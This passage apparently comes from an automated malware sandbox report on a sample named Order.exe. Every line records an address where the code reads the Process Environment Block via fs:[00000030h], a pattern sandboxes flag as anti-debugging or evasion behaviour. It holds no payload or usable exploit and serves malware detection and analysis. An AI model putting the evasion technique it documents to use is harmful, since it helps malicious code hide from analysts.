                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019DE016 mov eax, dword ptr fs:[00000030h]9_2_019DE016
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019DE016 mov eax, dword ptr fs:[00000030h]9_2_019DE016
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A56030 mov eax, dword ptr fs:[00000030h]9_2_01A56030
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A44000 mov ecx, dword ptr fs:[00000030h]9_2_01A44000
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A62000 mov eax, dword ptr fs:[00000030h]9_2_01A62000
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A62000 mov eax, dword ptr fs:[00000030h]9_2_01A62000
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A62000 mov eax, dword ptr fs:[00000030h]9_2_01A62000
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A62000 mov eax, dword ptr fs:[00000030h]9_2_01A62000
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A62000 mov eax, dword ptr fs:[00000030h]9_2_01A62000
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A62000 mov eax, dword ptr fs:[00000030h]9_2_01A62000
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A62000 mov eax, dword ptr fs:[00000030h]9_2_01A62000
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A62000 mov eax, dword ptr fs:[00000030h]9_2_01A62000
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019BA020 mov eax, dword ptr fs:[00000030h]9_2_019BA020
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019BC020 mov eax, dword ptr fs:[00000030h]9_2_019BC020
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019C2050 mov eax, dword ptr fs:[00000030h]9_2_019C2050
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019EC073 mov eax, dword ptr fs:[00000030h]9_2_019EC073
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A46050 mov eax, dword ptr fs:[00000030h]9_2_01A46050
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019B8397 mov eax, dword ptr fs:[00000030h]9_2_019B8397
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019B8397 mov eax, dword ptr fs:[00000030h]9_2_019B8397
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019B8397 mov eax, dword ptr fs:[00000030h]9_2_019B8397
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019E438F mov eax, dword ptr fs:[00000030h]9_2_019E438F
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019E438F mov eax, dword ptr fs:[00000030h]9_2_019E438F
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019BE388 mov eax, dword ptr fs:[00000030h]9_2_019BE388
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019BE388 mov eax, dword ptr fs:[00000030h]9_2_019BE388
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019BE388 mov eax, dword ptr fs:[00000030h]9_2_019BE388
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019CA3C0 mov eax, dword ptr fs:[00000030h]9_2_019CA3C0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019CA3C0 mov eax, dword ptr fs:[00000030h]9_2_019CA3C0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019CA3C0 mov eax, dword ptr fs:[00000030h]9_2_019CA3C0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019CA3C0 mov eax, dword ptr fs:[00000030h]9_2_019CA3C0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019CA3C0 mov eax, dword ptr fs:[00000030h]9_2_019CA3C0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019CA3C0 mov eax, dword ptr fs:[00000030h]9_2_019CA3C0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019C83C0 mov eax, dword ptr fs:[00000030h]9_2_019C83C0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019C83C0 mov eax, dword ptr fs:[00000030h]9_2_019C83C0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019C83C0 mov eax, dword ptr fs:[00000030h]9_2_019C83C0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019C83C0 mov eax, dword ptr fs:[00000030h]9_2_019C83C0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019F63FF mov eax, dword ptr fs:[00000030h]9_2_019F63FF
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A463C0 mov eax, dword ptr fs:[00000030h]9_2_01A463C0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A7C3CD mov eax, dword ptr fs:[00000030h]9_2_01A7C3CD
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019DE3F0 mov eax, dword ptr fs:[00000030h]9_2_019DE3F0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019DE3F0 mov eax, dword ptr fs:[00000030h]9_2_019DE3F0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019DE3F0 mov eax, dword ptr fs:[00000030h]9_2_019DE3F0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A643D4 mov eax, dword ptr fs:[00000030h]9_2_01A643D4
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A643D4 mov eax, dword ptr fs:[00000030h]9_2_01A643D4
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019D03E9 mov eax, dword ptr fs:[00000030h]9_2_019D03E9
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019D03E9 mov eax, dword ptr fs:[00000030h]9_2_019D03E9
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019D03E9 mov eax, dword ptr fs:[00000030h]9_2_019D03E9
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019D03E9 mov eax, dword ptr fs:[00000030h]9_2_019D03E9
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019D03E9 mov eax, dword ptr fs:[00000030h]9_2_019D03E9
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019D03E9 mov eax, dword ptr fs:[00000030h]9_2_019D03E9
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019D03E9 mov eax, dword ptr fs:[00000030h]9_2_019D03E9
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019D03E9 mov eax, dword ptr fs:[00000030h]9_2_019D03E9
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A6E3DB mov eax, dword ptr fs:[00000030h]9_2_01A6E3DB
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A6E3DB mov eax, dword ptr fs:[00000030h]9_2_01A6E3DB
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A6E3DB mov ecx, dword ptr fs:[00000030h]9_2_01A6E3DB
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A6E3DB mov eax, dword ptr fs:[00000030h]9_2_01A6E3DB
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019BC310 mov ecx, dword ptr fs:[00000030h]9_2_019BC310
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A98324 mov eax, dword ptr fs:[00000030h]9_2_01A98324
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A98324 mov ecx, dword ptr fs:[00000030h]9_2_01A98324
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A98324 mov eax, dword ptr fs:[00000030h]9_2_01A98324
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A98324 mov eax, dword ptr fs:[00000030h]9_2_01A98324
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019E0310 mov ecx, dword ptr fs:[00000030h]9_2_019E0310
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019FA30B mov eax, dword ptr fs:[00000030h]9_2_019FA30B
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019FA30B mov eax, dword ptr fs:[00000030h]9_2_019FA30B
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019FA30B mov eax, dword ptr fs:[00000030h]9_2_019FA30B
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A6437C mov eax, dword ptr fs:[00000030h]9_2_01A6437C
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A9634F mov eax, dword ptr fs:[00000030h]9_2_01A9634F
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A42349 mov eax, dword ptr fs:[00000030h]9_2_01A42349
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A42349 mov eax, dword ptr fs:[00000030h]9_2_01A42349
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A42349 mov eax, dword ptr fs:[00000030h]9_2_01A42349
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A42349 mov eax, dword ptr fs:[00000030h]9_2_01A42349
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A42349 mov eax, dword ptr fs:[00000030h]9_2_01A42349
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A42349 mov eax, dword ptr fs:[00000030h]9_2_01A42349
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A42349 mov eax, dword ptr fs:[00000030h]9_2_01A42349
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A42349 mov eax, dword ptr fs:[00000030h]9_2_01A42349
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A42349 mov eax, dword ptr fs:[00000030h]9_2_01A42349
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A42349 mov eax, dword ptr fs:[00000030h]9_2_01A42349
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A42349 mov eax, dword ptr fs:[00000030h]9_2_01A42349
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A42349 mov eax, dword ptr fs:[00000030h]9_2_01A42349
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A42349 mov eax, dword ptr fs:[00000030h]9_2_01A42349
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A42349 mov eax, dword ptr fs:[00000030h]9_2_01A42349
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A42349 mov eax, dword ptr fs:[00000030h]9_2_01A42349
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A68350 mov ecx, dword ptr fs:[00000030h]9_2_01A68350
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A4035C mov eax, dword ptr fs:[00000030h]9_2_01A4035C
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A4035C mov eax, dword ptr fs:[00000030h]9_2_01A4035C
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A4035C mov eax, dword ptr fs:[00000030h]9_2_01A4035C
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A4035C mov ecx, dword ptr fs:[00000030h]9_2_01A4035C
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A4035C mov eax, dword ptr fs:[00000030h]9_2_01A4035C
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A4035C mov eax, dword ptr fs:[00000030h]9_2_01A4035C
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A8A352 mov eax, dword ptr fs:[00000030h]9_2_01A8A352
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A562A0 mov eax, dword ptr fs:[00000030h]9_2_01A562A0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A562A0 mov ecx, dword ptr fs:[00000030h]9_2_01A562A0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A562A0 mov eax, dword ptr fs:[00000030h]9_2_01A562A0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A562A0 mov eax, dword ptr fs:[00000030h]9_2_01A562A0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A562A0 mov eax, dword ptr fs:[00000030h]9_2_01A562A0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A562A0 mov eax, dword ptr fs:[00000030h]9_2_01A562A0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019FE284 mov eax, dword ptr fs:[00000030h]9_2_019FE284
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019FE284 mov eax, dword ptr fs:[00000030h]9_2_019FE284
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A40283 mov eax, dword ptr fs:[00000030h]9_2_01A40283
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A40283 mov eax, dword ptr fs:[00000030h]9_2_01A40283
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A40283 mov eax, dword ptr fs:[00000030h]9_2_01A40283
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019D02A0 mov eax, dword ptr fs:[00000030h]9_2_019D02A0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019D02A0 mov eax, dword ptr fs:[00000030h]9_2_019D02A0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019CA2C3 mov eax, dword ptr fs:[00000030h]9_2_019CA2C3
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019CA2C3 mov eax, dword ptr fs:[00000030h]9_2_019CA2C3
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019CA2C3 mov eax, dword ptr fs:[00000030h]9_2_019CA2C3
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019CA2C3 mov eax, dword ptr fs:[00000030h]9_2_019CA2C3
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019CA2C3 mov eax, dword ptr fs:[00000030h]9_2_019CA2C3
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019D02E1 mov eax, dword ptr fs:[00000030h]9_2_019D02E1
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019D02E1 mov eax, dword ptr fs:[00000030h]9_2_019D02E1
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019D02E1 mov eax, dword ptr fs:[00000030h]9_2_019D02E1
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A962D6 mov eax, dword ptr fs:[00000030h]9_2_01A962D6
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019B823B mov eax, dword ptr fs:[00000030h]9_2_019B823B
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019C6259 mov eax, dword ptr fs:[00000030h]9_2_019C6259
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019BA250 mov eax, dword ptr fs:[00000030h]9_2_019BA250
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A70274 mov eax, dword ptr fs:[00000030h]9_2_01A70274
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A70274 mov eax, dword ptr fs:[00000030h]9_2_01A70274
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A70274 mov eax, dword ptr fs:[00000030h]9_2_01A70274
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A70274 mov eax, dword ptr fs:[00000030h]9_2_01A70274
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A70274 mov eax, dword ptr fs:[00000030h]9_2_01A70274
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A70274 mov eax, dword ptr fs:[00000030h]9_2_01A70274
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A70274 mov eax, dword ptr fs:[00000030h]9_2_01A70274
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A70274 mov eax, dword ptr fs:[00000030h]9_2_01A70274
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A70274 mov eax, dword ptr fs:[00000030h]9_2_01A70274
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A70274 mov eax, dword ptr fs:[00000030h]9_2_01A70274
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A70274 mov eax, dword ptr fs:[00000030h]9_2_01A70274
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A70274 mov eax, dword ptr fs:[00000030h]9_2_01A70274
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A48243 mov eax, dword ptr fs:[00000030h]9_2_01A48243
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A48243 mov ecx, dword ptr fs:[00000030h]9_2_01A48243
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019B826B mov eax, dword ptr fs:[00000030h]9_2_019B826B
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A9625D mov eax, dword ptr fs:[00000030h]9_2_01A9625D
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A7A250 mov eax, dword ptr fs:[00000030h]9_2_01A7A250
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A7A250 mov eax, dword ptr fs:[00000030h]9_2_01A7A250
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019C4260 mov eax, dword ptr fs:[00000030h]9_2_019C4260
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019C4260 mov eax, dword ptr fs:[00000030h]9_2_019C4260
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019C4260 mov eax, dword ptr fs:[00000030h]9_2_019C4260
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019FE59C mov eax, dword ptr fs:[00000030h]9_2_019FE59C
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A405A7 mov eax, dword ptr fs:[00000030h]9_2_01A405A7
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A405A7 mov eax, dword ptr fs:[00000030h]9_2_01A405A7
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A405A7 mov eax, dword ptr fs:[00000030h]9_2_01A405A7
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019F4588 mov eax, dword ptr fs:[00000030h]9_2_019F4588
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019C2582 mov eax, dword ptr fs:[00000030h]9_2_019C2582
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019C2582 mov ecx, dword ptr fs:[00000030h]9_2_019C2582
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019E45B1 mov eax, dword ptr fs:[00000030h]9_2_019E45B1
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019E45B1 mov eax, dword ptr fs:[00000030h]9_2_019E45B1
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019C65D0 mov eax, dword ptr fs:[00000030h]9_2_019C65D0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019FA5D0 mov eax, dword ptr fs:[00000030h]9_2_019FA5D0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019FA5D0 mov eax, dword ptr fs:[00000030h]9_2_019FA5D0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019FE5CF mov eax, dword ptr fs:[00000030h]9_2_019FE5CF
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019FE5CF mov eax, dword ptr fs:[00000030h]9_2_019FE5CF
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019FC5ED mov eax, dword ptr fs:[00000030h]9_2_019FC5ED
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019FC5ED mov eax, dword ptr fs:[00000030h]9_2_019FC5ED
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019EE5E7 mov eax, dword ptr fs:[00000030h]9_2_019EE5E7
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019EE5E7 mov eax, dword ptr fs:[00000030h]9_2_019EE5E7
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019EE5E7 mov eax, dword ptr fs:[00000030h]9_2_019EE5E7
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019EE5E7 mov eax, dword ptr fs:[00000030h]9_2_019EE5E7
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019EE5E7 mov eax, dword ptr fs:[00000030h]9_2_019EE5E7
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019EE5E7 mov eax, dword ptr fs:[00000030h]9_2_019EE5E7
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019EE5E7 mov eax, dword ptr fs:[00000030h]9_2_019EE5E7
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019EE5E7 mov eax, dword ptr fs:[00000030h]9_2_019EE5E7
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019C25E0 mov eax, dword ptr fs:[00000030h]9_2_019C25E0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019EE53E mov eax, dword ptr fs:[00000030h]9_2_019EE53E
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019EE53E mov eax, dword ptr fs:[00000030h]9_2_019EE53E
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019EE53E mov eax, dword ptr fs:[00000030h]9_2_019EE53E
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019EE53E mov eax, dword ptr fs:[00000030h]9_2_019EE53E
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019EE53E mov eax, dword ptr fs:[00000030h]9_2_019EE53E
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A56500 mov eax, dword ptr fs:[00000030h]9_2_01A56500
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019D0535 mov eax, dword ptr fs:[00000030h]9_2_019D0535
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019D0535 mov eax, dword ptr fs:[00000030h]9_2_019D0535
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019D0535 mov eax, dword ptr fs:[00000030h]9_2_019D0535
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019D0535 mov eax, dword ptr fs:[00000030h]9_2_019D0535
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019D0535 mov eax, dword ptr fs:[00000030h]9_2_019D0535
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019D0535 mov eax, dword ptr fs:[00000030h]9_2_019D0535
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A94500 mov eax, dword ptr fs:[00000030h]9_2_01A94500
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A94500 mov eax, dword ptr fs:[00000030h]9_2_01A94500
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A94500 mov eax, dword ptr fs:[00000030h]9_2_01A94500
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A94500 mov eax, dword ptr fs:[00000030h]9_2_01A94500
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A94500 mov eax, dword ptr fs:[00000030h]9_2_01A94500
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A94500 mov eax, dword ptr fs:[00000030h]9_2_01A94500
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A94500 mov eax, dword ptr fs:[00000030h]9_2_01A94500
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019C8550 mov eax, dword ptr fs:[00000030h]9_2_019C8550
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019C8550 mov eax, dword ptr fs:[00000030h]9_2_019C8550
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019F656A mov eax, dword ptr fs:[00000030h]9_2_019F656A
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019F656A mov eax, dword ptr fs:[00000030h]9_2_019F656A
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019F656A mov eax, dword ptr fs:[00000030h]9_2_019F656A
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A4A4B0 mov eax, dword ptr fs:[00000030h]9_2_01A4A4B0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019F44B0 mov ecx, dword ptr fs:[00000030h]9_2_019F44B0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019C64AB mov eax, dword ptr fs:[00000030h]9_2_019C64AB
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A7A49A mov eax, dword ptr fs:[00000030h]9_2_01A7A49A
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019C04E5 mov ecx, dword ptr fs:[00000030h]9_2_019C04E5
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A46420 mov eax, dword ptr fs:[00000030h]9_2_01A46420
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A46420 mov eax, dword ptr fs:[00000030h]9_2_01A46420
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A46420 mov eax, dword ptr fs:[00000030h]9_2_01A46420
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A46420 mov eax, dword ptr fs:[00000030h]9_2_01A46420
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A46420 mov eax, dword ptr fs:[00000030h]9_2_01A46420
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A46420 mov eax, dword ptr fs:[00000030h]9_2_01A46420
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A46420 mov eax, dword ptr fs:[00000030h]9_2_01A46420
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019F8402 mov eax, dword ptr fs:[00000030h]9_2_019F8402
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019F8402 mov eax, dword ptr fs:[00000030h]9_2_019F8402
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019F8402 mov eax, dword ptr fs:[00000030h]9_2_019F8402
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019FA430 mov eax, dword ptr fs:[00000030h]9_2_019FA430
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019BE420 mov eax, dword ptr fs:[00000030h]9_2_019BE420
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019BE420 mov eax, dword ptr fs:[00000030h]9_2_019BE420
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019BE420 mov eax, dword ptr fs:[00000030h]9_2_019BE420
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019BC427 mov eax, dword ptr fs:[00000030h]9_2_019BC427
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019E245A mov eax, dword ptr fs:[00000030h]9_2_019E245A
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A4C460 mov ecx, dword ptr fs:[00000030h]9_2_01A4C460
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019B645D mov eax, dword ptr fs:[00000030h]9_2_019B645D
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019FE443 mov eax, dword ptr fs:[00000030h]9_2_019FE443
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019FE443 mov eax, dword ptr fs:[00000030h]9_2_019FE443
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019FE443 mov eax, dword ptr fs:[00000030h]9_2_019FE443
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019FE443 mov eax, dword ptr fs:[00000030h]9_2_019FE443
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019FE443 mov eax, dword ptr fs:[00000030h]9_2_019FE443
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019FE443 mov eax, dword ptr fs:[00000030h]9_2_019FE443
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019FE443 mov eax, dword ptr fs:[00000030h]9_2_019FE443
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019FE443 mov eax, dword ptr fs:[00000030h]9_2_019FE443
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019EA470 mov eax, dword ptr fs:[00000030h]9_2_019EA470
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019EA470 mov eax, dword ptr fs:[00000030h]9_2_019EA470
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019EA470 mov eax, dword ptr fs:[00000030h]9_2_019EA470
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A7A456 mov eax, dword ptr fs:[00000030h]9_2_01A7A456
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A747A0 mov eax, dword ptr fs:[00000030h]9_2_01A747A0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A6678E mov eax, dword ptr fs:[00000030h]9_2_01A6678E
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019C07AF mov eax, dword ptr fs:[00000030h]9_2_019C07AF
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A4E7E1 mov eax, dword ptr fs:[00000030h]9_2_01A4E7E1
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019CC7C0 mov eax, dword ptr fs:[00000030h]9_2_019CC7C0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019C47FB mov eax, dword ptr fs:[00000030h]9_2_019C47FB
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019C47FB mov eax, dword ptr fs:[00000030h]9_2_019C47FB
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A407C3 mov eax, dword ptr fs:[00000030h]9_2_01A407C3
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019E27ED mov eax, dword ptr fs:[00000030h]9_2_019E27ED
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019E27ED mov eax, dword ptr fs:[00000030h]9_2_019E27ED
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019E27ED mov eax, dword ptr fs:[00000030h]9_2_019E27ED
